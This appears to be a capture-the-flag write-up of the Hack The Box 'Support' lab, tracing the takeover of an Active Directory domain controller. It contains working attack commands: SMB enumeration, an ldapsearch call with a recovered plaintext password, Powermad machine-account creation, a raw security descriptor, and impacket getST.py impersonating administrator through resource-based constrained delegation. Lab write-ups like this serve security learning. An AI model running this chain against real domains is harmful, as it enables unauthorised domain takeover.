PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-26 14:12:20Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Initial nmap results and looks like we’ve got a domain controller.
We get nothing we don’t already know from the DNS server and it’s not vulnerable to anything I know of so on to enumerate SMB.
smbmap -H 10.129.38.195 -u anonymous
[+] Guest session IP: 10.129.38.195:445 Name: support.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
support-tools READ ONLY support staff tools
SYSVOL NO ACCESS Logon server share smb: \> ls . D 0 Wed Jul 20 18:01:06 2022 .. D 0 Sat May 28 12:18:25 2022 7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 12:19:19 2022 npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 12:19:55 2022 putty.exe A 1273576 Sat May 28 12:20:06 2022 SysinternalsSuite.zip A 48102161 Sat May 28 12:19:31 2022 UserInfo.exe.zip A 277499 Wed Jul 20 18:01:07 2022 windirstat1_1_2_setup.exe A 79171 Sat May 28 12:20:17 2022 WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 12:19:43 2022
At this stage the only folder we can get into as anonymous user is support-tools which contains a handy bunch of files, but we also have read access over IPC$ which means with anonymous user we might be able to grab some creds with lookupsid.py from impacket.
None of these return ASREP hashes, so I’ll have a look at the SMB share. The only file that stands out is UserInfo.exe.zip. I’m not sure what it so I’ll analyse it.
I analyse it in dnSpy, as it’s a .NET file and am able to get out some password information, the exe is decrypting a string before authing to the server.
While continuing to poke around I realise since the binary is authenticating to the server using /etc/hosts to resolve support.htb, as I test I point /etc/hosts back to my Kali VM and open up Responder…
We’re also able to grab the NTLM hash. Not as useful as having the password so back to dnSpy and setting a break point in the debugger at the point the software makes a call for the password.
Here we can see the decrypted password for the user ldap we can see they’ve a bit more access to SMB but we get errors trying to connect.
Since we’re the LDAP user, let’s enumerate LDAP.
ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=support,DC=htb" > ldapsearch
Dumping all the data to a txt file to make it less painful to read, eventually we come across the support user with an interesting note.
This looks like a password, and with this we can EvilWinRM into the box.
First thing I’ll do is get SharpHound and Bloodhound done to enumerate the Domain.
Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb ... ms-ds-machineaccountquota : 10
Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity name msds-allowedtoactonbehalfofotheridentity ---- ---------------------------------------- DC
We have write access to the computer, and it doesn’t have msds-allowedtoactonbehalfofotheridentity enabled.
Using Powermad.ps1 we’ll add the new machine account.
New-MachineAccount -MachineAccount CACK01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose Verbose: [+] Domain Controller = dc.support.htb Verbose: [+] Domain = support.htb Verbose: [+] SAMAccountName = CACK01$ Verbose: [+] Distinguished Name = CN=CACK01,CN=Computers,DC=support,DC=htb [+] Machine account CACK01 added
Now we can grab its SID to create raw security descriptors.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0)
Now to grab a hash of our password (123456) from Rubeus
Now we can use this to generate a ticket.
python3 /opt/impacket/examples/getST.py support.htb/CACK01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey
export KRB5CCNAME=administrator.ccache
Support was a great box, I really enjoyed enumerating the services. I’m starting to understand Reverse Engineering more and always welcome an opportunity to graph a domain with BloodHound!